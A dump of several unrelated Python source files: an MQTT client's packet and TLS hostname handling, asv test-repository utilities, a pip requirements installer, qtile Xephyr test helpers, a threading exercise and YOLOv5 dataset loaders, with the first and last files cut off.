m.state = mqtt_ms_wait_for_pubcomp
m.timestamp = time.time()
self._out_message_mutex.release()
return self._send_pubrel(mid, False)
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_unsuback(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received UNSUBACK (Mid: "+str(mid)+")")
self._callback_mutex.acquire()
if self.on_unsubscribe:
self._in_callback = True
self.on_unsubscribe(self, self._userdata, mid)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_pubackcomp(self, cmd):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received "+cmd+" (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for i in range(len(self._out_messages)):
try:
if self._out_messages[i].mid == mid:
# Only inform the client the message has been sent once.
self._callback_mutex.acquire()
if self.on_publish:
self._out_message_mutex.release()
self._in_callback = True
self.on_publish(self, self._userdata, mid)
self._in_callback = False
self._out_message_mutex.acquire()
self._callback_mutex.release()
self._out_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
self._out_message_mutex.release()
return rc
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
except IndexError:
# Have removed item so i>count.
# Not really an error.
pass
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_on_message(self, message):
self._callback_mutex.acquire()
matched = False
for t in self.on_message_filtered:
if topic_matches_sub(t[0], message.topic):
self._in_callback = True
t[1](self, self._userdata, message)
self._in_callback = False
matched = True
if matched == False and self.on_message:
self._in_callback = True
self.on_message(self, self._userdata, message)
self._in_callback = False
self._callback_mutex.release()
def _thread_main(self):
self._state_mutex.acquire()
if self._state == mqtt_cs_connect_async:
self._state_mutex.release()
self.reconnect()
else:
self._state_mutex.release()
self.loop_forever()
def _host_matches_cert(self, host, cert_host):
if cert_host[0:2] == "*.":
if cert_host.count("*") != 1:
return False
host_match = host.split(".", 1)[1]
cert_match = cert_host.split(".", 1)[1]
if host_match == cert_match:
return True
else:
return False
else:
if host == cert_host:
return True
else:
return False
def _tls_match_hostname(self):
try:
cert = self._ssl.getpeercert()
except AttributeError:
# the getpeercert can throw Attribute error: object has no attribute 'peer_certificate'
# Don't let that crash the whole client. See also: http://bugs.python.org/issue13721
raise ssl.SSLError('Not connected')
san = cert.get('subjectAltName')
if san:
have_san_dns = False
for (key, value) in san:
if key == 'DNS':
have_san_dns = True
if self._host_matches_cert(self._host.lower(), value.lower()) == True:
return
if key == 'IP Address':
have_san_dns = True
if value.lower().strip() == self._host.lower().strip():
return
if have_san_dns:
# Only check subject if subjectAltName dns not found.
raise ssl.SSLError('Certificate subject does not match remote hostname.')
subject = cert.get('subject')
if subject:
for ((key, value),) in subject:
if key == 'commonName':
if self._host_matches_cert(self._host.lower(), value.lower()) == True:
return
raise ssl.SSLError('Certificate subject does not match remote hostname.')
# Compatibility class for easy porting from mosquitto.py.
class Mosquitto(Client):
def __init__(self, client_id="", clean_session=True, userdata=None):
super(Mosquitto, self).__init__(client_id, clean_session, userdata)
|
tools.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals, print_function
"""
This file contains utilities to generate test repositories.
"""
import datetime
import io
import os
import threading
import time
import six
import tempfile
import textwrap
import sys
from os.path import abspath, join, dirname, relpath, isdir
from contextlib import contextmanager
from hashlib import sha256
from six.moves import SimpleHTTPServer
import pytest
try:
import hglib
except ImportError as exc:
hglib = None
from asv import util
from asv import commands
from asv import config
from asv.commands.preview import create_httpd
from asv.repo import get_repo
from asv.results import Results
try:
import selenium
from selenium.common.exceptions import TimeoutException
HAVE_WEBDRIVER = True
except ImportError:
HAVE_WEBDRIVER = False
def run_asv(*argv):
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
return args.func(args)
def run_asv_with_conf(conf, *argv, **kwargs):
assert isinstance(conf, config.Config)
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
if sys.version_info[0] >= 3:
cls = args.func.__self__
else:
cls = args.func.im_self
return cls.run_from_conf_args(conf, args, **kwargs)
# These classes are defined here, rather than using asv/plugins/git.py
# and asv/plugins/mercurial.py since here we need to perform write
# operations to the repository, and the others should be read-only for
# safety.
class Git(object):
def __init__(self, path):
self.path = abspath(path)
self._git = util.which('git')
self._fake_date = datetime.datetime.now()
def run_git(self, args, chdir=True, **kwargs):
if chdir:
cwd = self.path
else:
cwd = None
kwargs['cwd'] = cwd
return util.check_output(
[self._git] + args, **kwargs)
def init(self):
self.run_git(['init'])
self.run_git(['config', 'user.email', 'robot@asv'])
self.run_git(['config', 'user.name', 'Robotic Swallow'])
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
self.run_git(['commit', '--date', date.isoformat(),
'-m', message])
def tag(self, number):
self.run_git(['tag', '-a', '-m', 'Tag {0}'.format(number),
'tag{0}'.format(number)])
def add(self, filename):
self.run_git(['add', relpath(filename, self.path)])
def checkout(self, branch_name, start_commit=None):
args = ["checkout"]
if start_commit is not None:
args.extend(["-b", branch_name, start_commit])
else:
args.append(branch_name)
self.run_git(args)
def merge(self, branch_name, commit_message=None):
self.run_git(["merge", "--no-ff", "--no-commit", "-X", "theirs", branch_name])
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
return self.run_git(['rev-parse', name]).strip()
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "master"
return [x.strip() for x in self.run_git(['rev-list', branch]).splitlines()
if x.strip()]
def get_commit_message(self, commit_hash):
return self.run_git(["log", "-n", "1", "--format=%s", commit_hash]).strip()
_hg_config = """
[ui]
username = Robotic Swallow <robot@asv>
"""
class Hg(object):
encoding = 'utf-8'
def __init__(self, path):
self._fake_date = datetime.datetime.now()
self.path = abspath(path)
def init(self):
hglib.init(self.path)
with io.open(join(self.path, '.hg', 'hgrc'), 'w', encoding="utf-8") as fd:
fd.write(_hg_config)
self._repo = hglib.open(self.path.encode(sys.getfilesystemencoding()),
encoding=self.encoding)
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
date = "{0} 0".format(util.datetime_to_timestamp(date))
self._repo.commit(message.encode(self.encoding),
date=date.encode(self.encoding))
def tag(self, number):
self._fake_date += datetime.timedelta(seconds=1)
date = "{0} 0".format(util.datetime_to_timestamp(self._fake_date))
self._repo.tag(
['tag{0}'.format(number).encode(self.encoding)],
message="Tag {0}".format(number).encode(self.encoding),
date=date.encode(self.encoding))
def add(self, filename):
self._repo.add([filename.encode(sys.getfilesystemencoding())])
def checkout(self, branch_name, start_commit=None):
if start_commit is not None:
self._repo.update(start_commit.encode(self.encoding))
self._repo.branch(branch_name.encode(self.encoding))
else:
self._repo.update(branch_name.encode(self.encoding))
def merge(self, branch_name, commit_message=None):
self._repo.merge(branch_name.encode(self.encoding),
tool=b"internal:other")
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
log = self._repo.log(name.encode(self.encoding), limit=1)
if log:
return log[0][1].decode(self.encoding)
return None
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "default"
log = self._repo.log('sort(ancestors({0}), -rev)'.format(branch).encode(self.encoding))
return [entry[1].decode(self.encoding) for entry in log]
def get_commit_message(self, commit_hash):
return self._repo.log(commit_hash.encode(self.encoding))[0].desc.decode(self.encoding)
def copy_template(src, dst, dvcs, values):
for root, dirs, files in os.walk(src):
for dir in dirs:
src_path = join(root, dir)
dst_path = join(dst, relpath(src_path, src))
if not isdir(dst_path):
os.makedirs(dst_path)
for file in files:
src_path = join(root, file)
dst_path = join(dst, relpath(src_path, src))
try:
with io.open(src_path, 'r', encoding='utf-8') as fd:
content = fd.read()
except UnicodeDecodeError:
# File is some sort of binary file... just copy it
# directly with no template substitution
with io.open(src_path, 'rb') as fd:
content = fd.read()
with io.open(dst_path, 'wb') as fd:
fd.write(content)
else:
content = content.format(**values)
with io.open(dst_path, 'w', encoding='utf-8') as fd:
fd.write(content)
dvcs.add(dst_path)
def generate_test_repo(tmpdir, values=[0], dvcs_type='git',
extra_branches=(), subdir=''):
"""
Generate a test repository
Parameters
----------
tmpdir
Repository directory
values : list
List of values to substitute in the template
dvcs_type : {'git', 'hg'}
What dvcs to use
extra_branches : list of (start_commit, branch_name, values)
Additional branches to generate in the repository.
For branch start commits, use relative references, e.g.,
the format 'master~10' or 'default~10' works both for Hg
and Git.
subdir
A relative subdirectory inside the repository to copy the
test project into.
Returns
-------
dvcs : Git or Hg
"""
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
project_path = os.path.join(dvcs_path, subdir)
if not os.path.exists(project_path):
os.makedirs(project_path)
for i, value in enumerate(values):
mapping = {
'version': i,
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}".format(i))
dvcs.tag(i)
if extra_branches:
for start_commit, branch_name, values in extra_branches:
dvcs.checkout(branch_name, start_commit)
for i, value in enumerate(values):
mapping = {
'version': "{0}".format(i),
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}.{1}".format(branch_name, i))
return dvcs
def generate_repo_from_ops(tmpdir, dvcs_type, operations):
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
version = 0
for op in operations:
if op[0] == "commit":
copy_template(template_path, dvcs_path, dvcs, {
"version": version,
"dummy_value": op[1],
})
version += 1
dvcs.commit("Revision {0}".format(version), *op[2:])
elif op[0] == "checkout":
dvcs.checkout(*op[1:])
elif op[0] == "merge":
dvcs.merge(*op[1:])
else:
raise ValueError("Unknown dvcs operation {0}".format(op))
return dvcs
def generate_result_dir(tmpdir, dvcs, values, branches=None):
result_dir = join(tmpdir, "results")
os.makedirs(result_dir)
html_dir = join(tmpdir, "html")
machine_dir = join(result_dir, "tarzan")
os.makedirs(machine_dir)
if branches is None:
branches = [None]
conf = config.Config.from_json({
'results_dir': result_dir,
'html_dir': html_dir,
'repo': dvcs.path,
'project': 'asv',
'branches': branches or [None],
})
repo = get_repo(conf)
util.write_json(join(machine_dir, "machine.json"), {
'machine': 'tarzan',
'version': 1,
})
timestamp = datetime.datetime.utcnow()
benchmark_version = sha256(os.urandom(16)).hexdigest()
params = None
param_names = None
for commit, value in values.items():
if isinstance(value, dict):
params = value["params"]
result = Results({"machine": "tarzan"}, {}, commit,
repo.get_date_from_name(commit), "2.7", None)
value = {
'result': [value],
'params': [],
'started_at': timestamp,
'ended_at': timestamp,
'stats': None,
'samples': None,
'number': None,
}
result.add_result("time_func", value, benchmark_version)
result.save(result_dir)
if params:
param_names = ["param{}".format(k) for k in range(len(params))]
util.write_json(join(result_dir, "benchmarks.json"), {
"time_func": {
"name": "time_func",
"params": params or [],
"param_names": param_names or [],
"version": benchmark_version,
}
}, api_version=1)
return conf
@pytest.fixture(scope="session")
def browser(request, pytestconfig):
"""
Fixture for Selenium WebDriver browser interface
"""
driver_str = pytestconfig.getoption('webdriver')
if driver_str == "None":
pytest.skip("No webdriver selected for tests (use --webdriver).")
# Evaluate the options
def FirefoxHeadless():
from selenium.webdriver.firefox.options import Options
options = Options()
options.add_argument("-headless")
return selenium.webdriver.Firefox(firefox_options=options)
def ChromeHeadless():
options = selenium.webdriver.ChromeOptions()
options.add_argument('headless')
return selenium.webdriver.Chrome(chrome_options=options)
ns = {}
six.exec_("import selenium.webdriver", ns)
six.exec_("from selenium.webdriver import *", ns)
ns['FirefoxHeadless'] = FirefoxHeadless
ns['ChromeHeadless'] = ChromeHeadless
create_driver = ns.get(driver_str, None)
if create_driver is None:
src = "def create_driver():\n"
src += textwrap.indent(driver_str, " ")
six.exec_(src, ns)
create_driver = ns['create_driver']
# Create the browser
browser = create_driver()
# Set timeouts
browser.set_page_load_timeout(10)
browser.set_script_timeout(10)
# Clean up on fixture finalization
def fin():
browser.quit()
request.addfinalizer(fin)
# Set default time to wait for AJAX requests to complete
browser.implicitly_wait(5)
return browser
@contextmanager
def preview(base_path):
"""
Context manager for ASV preview web server. Gives the base URL to use.
Parameters
----------
base_path : str
Path to serve files from
"""
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
# Don't serve from cwd, but from a different directory
path = SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path)
path = os.path.join(base_path, os.path.relpath(path, os.getcwd()))
return util.long_path(path)
httpd, base_url = create_httpd(Handler)
def run():
try:
httpd.serve_forever()
except:
import traceback
traceback.print_exc()
return
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
try:
yield base_url
finally:
# Stop must be run in a separate thread, because
# httpd.shutdown blocks until serve_forever returns. We don't
# want to block here --- it appears in some environments
# problems shutting down the server may arise.
stopper = threading.Thread(target=httpd.shutdown)
stopper.daemon = True
stopper.start()
stopper.join(5.0)
def get_with_retry(browser, url):
for j in range(2):
try:
return browser.get(url)
except TimeoutException:
time.sleep(2)
return browser.get(url)
|
install.py
|
# Date: 01/09/2019
# Author: Mohamed
# Description: Install file
from time import sleep
from queue import Queue
from os.path import exists
from subprocess import Popen
from threading import Thread, RLock
class Install:
def __init__(self, path_to_req):
self.lock = RLock()
self.is_alive = True
self.is_reading = True
self.is_installing = False
self.requirements = Queue()
self.path_to_req = path_to_req
@property
def path_exists(self):
return exists(self.path_to_req)
def read_file(self):
with open('requirements.txt', mode='rt') as file:
for line in file:
if line:
with self.lock:
self.requirements.put(line.replace('\n', ''))
self.is_reading = False
def install(self, name):
print('[+] Installing {} ...'.format(name))
cmd = 'pip install {}'.format(name)
cmd = cmd.split()
try:
self.is_installing = True
Popen(cmd).wait()
except:
print('[!] Failed to install {}'.format(name))
finally:
print('\n')
self.is_installing = False
def install_all(self):
while self.is_alive:
while self.requirements.qsize():
with self.lock:
name = self.requirements.get()
self.install(name)
def start_primary_threads(self):
read_thread = Thread(target=self.read_file)
install_all_thread = Thread(target=self.install_all)
read_thread.daemon = True
install_all_thread.daemon = True
read_thread.start()
install_all_thread.start()
def start(self):
if self.path_exists:
self.start_primary_threads()
while self.is_alive:
try:
if not self.is_reading and not self.requirements.qsize() and not self.is_installing:
self.stop()
sleep(0.5)
except KeyboardInterrupt:
self.stop()
else:
print('[*] Unable to locate the file requirements.txt')
def stop(self):
self.is_alive = False
if __name__ == '__main__':
path_to_req = 'requirements.txt'
install = Install(path_to_req)
install.start()
|
test_process_3.py
|
##########################################################################
# Testing of python process
##########################################################################
import logging
from multiprocessing import Queue, Process, Event, Lock
# Loop until stop
def loop(queue, stop, lock, logger):
""" run the process """
while not stop.is_set():
# Take data from queue
data = queue.get(block=True, timeout=None)
# Do something with data
# ...
# Report
lock.acquire()
print("Done Something")
logger.log(logging.INFO, 'Done something')
lock.release()
if __name__ == '__main__':
logger = logging.getLogger("Tester")
# Threading Locks, Events
stop = Event()
lock = Lock()
stop.clear()
# Setting up queue
queue = Queue(maxsize=32)
print("Setting up Process")
process=Process(target=loop, args=(queue, stop, lock, logger, ))
process.daemon = True
process.start()
print("Provide data to Process queue")
data = [0,1,2,3,4,5,6,7]
if not queue.full():
queue.put(data, block=False)
# Finish
print("Cleaning up")
stop.set()
process.join()
process.close()
queue.close()
|
utils.py
|
# Copyright (c) 2011 Florian Mounier
# Copyright (c) 2011 Anshuman Bhaduri
# Copyright (c) 2014 Sean Vig
# Copyright (c) 2014-2015 Tycho Andersen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import libqtile
import libqtile.ipc
from libqtile.manager import Qtile
from libqtile.log_utils import init_log
import logging
import multiprocessing
import os
import shutil
import subprocess
import sys
import tempfile
import time
import traceback
import xcffib
import xcffib.xproto
from nose.tools import with_setup, assert_raises
from nose.plugins.attrib import attr
from functools import wraps
WIDTH = 800
HEIGHT = 600
SECOND_WIDTH = 640
SECOND_HEIGHT = 480
def _find_display():
"""
Returns the next available display
"""
display = 1
while os.path.exists("/tmp/.X%s-lock" % display):
display += 1
return display
def whereis(program):
for path in os.environ.get('PATH', '').split(':'):
if os.path.exists(os.path.join(path, program)) and \
not os.path.isdir(os.path.join(path, program)):
return os.path.join(path, program)
return None
class Xephyr(object):
def __init__(self, xinerama, config, start_qtile=True,
randr=False, two_screens=True,
width=WIDTH, height=HEIGHT, xoffset=None):
self.xinerama, self.randr = xinerama, randr
self.config = config
self.start_qtile = start_qtile
self.two_screens = two_screens
self.width = width
self.height = height
if xoffset is None:
self.xoffset = width
else:
self.xoffset = xoffset
self.qtile = None # Handle to Qtile instance, multiprocessing.Process object
self.xephyr = None # Handle to Xephyr instance, subprocess.Popen object
self.display = ":{}".format(_find_display())
def __call__(self, function):
def teardown():
# Remove temporary files
if os.path.exists(self.tempdir):
shutil.rmtree(self.tempdir)
# Shutdown Xephyr
self._stopXephyr()
def setup():
# Setup socket and log files
self.tempdir = tempfile.mkdtemp()
self.sockfile = os.path.join(self.tempdir, 'qtile.sock')
self.logfile = os.path.join(self.tempdir, 'qtile.log')
self.testwindows = []
# Setup Xephyr
try:
self._startXephyr()
except AssertionError:
teardown()
raise
@attr('xephyr')
@with_setup(setup, teardown)
@wraps(function)
def wrapped_fun():
try:
if self.start_qtile:
self.startQtile(self.config)
return function(self)
finally:
if os.path.exists(self.logfile):
with open(self.logfile) as f:
log_output = f.read().strip()
if log_output:
print("------------------------ >> begin log file << ------------------------")
print(log_output)
print("------------------------- >> end log file << -------------------------")
else:
print("------------------------ >> log file empty << ------------------------")
# If we started qtile, we should be sure to take it down
if self.start_qtile:
self.stopQtile()
# If we didn't start qtile, make sure the user took it down if needed
if self.qtile and not self.start_qtile:
raise AssertionError("Stop qtile!")
return wrapped_fun
def _startXephyr(self, restart=True):
args = [
"Xephyr", "-name", "qtile_test",
self.display, "-ac",
"-screen", "%sx%s" % (self.width, self.height)]
if self.two_screens:
args.extend(["-origin", "%s,0" % self.xoffset, "-screen",
"%sx%s" % (SECOND_WIDTH, SECOND_HEIGHT)])
if self.xinerama:
args.extend(["+xinerama"])
if self.randr:
args.extend(["+extension", "RANDR"])
self.xephyr = subprocess.Popen(args,
stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
try:
self._waitForXephyr()
except AssertionError:
# We'll try to get a new display and try one more time...
if restart:
self.display = ":{}".format(_find_display())
self._startXephyr(restart=False)
else:
raise
def _stopXephyr(self):
assert self.xephyr is not None, "Xephyr must be started first"
# Complain if qtile or windows are running, but still kill xephyr
try:
assert self.qtile is None, "Kill Qtile before stopping Xephyr"
assert self.testwindows == [], "Kill all test windows before stopping Xephyr"
finally:
# Kill xephyr only if it is running
if self.xephyr.poll() is None:
self._kill(self.xephyr)
self.xephyr = None
def _waitForXephyr(self):
# Wait until Xephyr process dies
while self.xephyr.poll() is None:
try:
conn = xcffib.connect(self.display)
break
except xcffib.ConnectionException:
pass
time.sleep(0.1)
else:
(stdout_data, stderr_data) = self.xephyr.communicate()
raise AssertionError("Error launching Xephyr, quit with return code: {:d}\n"
"stderr: {}\n"
"stdout: {}".format(
self.xephyr.returncode,
stderr_data.decode(),
stdout_data.decode()
)
)
conn.disconnect()
del conn
def startQtile(self, config):
rpipe, wpipe = multiprocessing.Pipe()
def runQtile():
try:
init_log(logging.INFO, log_path=self.logfile, log_color=False)
q = Qtile(config, self.display, self.sockfile)
q.loop()
except Exception:
wpipe.send(traceback.format_exc())
with open(self.logfile, 'a') as f:
f.write("--------------------- >> begin qtile traceback << --------------------")
f.write(traceback.format_exc())
f.write("-------------------- >> begin qtile traceback << ---------------------")
self.qtile = multiprocessing.Process(target=runQtile)
self.qtile.start()
self._waitForQtile(rpipe)
def stopQtile(self):
assert self.qtile is not None, "Qtile must be started first"
self.qtile.terminate()
self.qtile.join(10)
if self.qtile.is_alive():
# desparate times... this probably messes with multiprocessing...
try:
os.kill(self.qtile.pid, 9)
os.waitpid(self.qtile.pid, 0)
except OSError:
# The process may have died due to some other error
pass
if self.qtile.exitcode:
print("Qtile exited with exitcode: %d" % self.qtile.exitcode)
self.qtile = None
# Kill all the windows
for proc in self.testwindows[:]:
self._kill(proc)
def _waitForQtile(self, errpipe):
# First, wait for socket to appear
start = time.time()
while time.time() < start + 10:
if os.path.exists(self.sockfile):
break
if errpipe.poll(0.1):
error = errpipe.recv()
raise AssertionError("Error launching Qtile, traceback:\n%s" % error)
else:
raise AssertionError("Error launching Qtile, socket never came up")
self.c = libqtile.command.Client(self.sockfile)
# Next, wait for server to come up
start = time.time()
while time.time() < start + 10:
try:
if self.c.status() == "OK":
break
except libqtile.ipc.IPCError:
pass
if errpipe.poll(0.1):
error = errpipe.recv()
raise AssertionError("Error launching Qtile, traceback:\n%s" % error)
else:
raise AssertionError("Error launching Qtile, quit without exception")
def _testProc(self, args):
if not args:
raise AssertionError("Trying to run nothing! (missing arguments)")
start = len(self.c.windows())
proc = subprocess.Popen(args, env={"DISPLAY": self.display})
while proc.poll() is None:
try:
if len(self.c.windows()) > start:
break
except RuntimeError:
pass
time.sleep(0.1)
else:
raise AssertionError("Window never appeared...")
self.testwindows.append(proc)
return proc
def groupconsistency(self):
groups = self.c.groups()
screens = self.c.screens()
seen = set()
for g in groups.values():
scrn = g["screen"]
if scrn is not None:
if scrn in seen:
raise AssertionError(
"Screen referenced from more than one group.")
seen.add(scrn)
assert screens[scrn]["group"] == g["name"]
assert len(seen) == len(screens), "Not all screens \
had an attached group."
def qtileRaises(self, exc, config):
assert_raises(exc, Qtile,
config, self.display, self.sockfile)
def testWindow(self, name):
python = sys.executable
d = os.path.dirname(os.path.realpath(__file__))
python = sys.executable
path = os.path.join(d, "scripts", "window.py")
return self._testProc(
[python, path, self.display, name]
)
def testXclock(self):
path = whereis("xclock")
return self._testProc(
[path]
)
def testXeyes(self):
path = whereis("xeyes")
return self._testProc(
[path]
)
def testGkrellm(self):
path = whereis("gkrellm")
return self._testProc(
[path]
)
def testXterm(self):
path = whereis("xterm")
return self._testProc(
[path]
)
def _kill(self, proc):
proc.kill()
proc.wait()
if proc in self.testwindows:
self.testwindows.remove(proc)
def kill(self, proc):
start = len(self.c.windows())
self._kill(proc)
for i in range(20):
if len(self.c.windows()) < start:
break
time.sleep(0.1)
else:
raise AssertionError("Window could not be killed...")
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
# TODO: increment i 1_000_000 times
for x in range(1000000):
i += 1
def decrementingFunction():
global i
# TODO: decrement i 1_000_000 times
for x in range(1000000):
i -= 1
def main():
# TODO: Something is missing here (needed to print i)
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from data.convert_data import xml2txt
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, resample_segments, \
clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
# dataset_5 = dataset[0:5000]
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
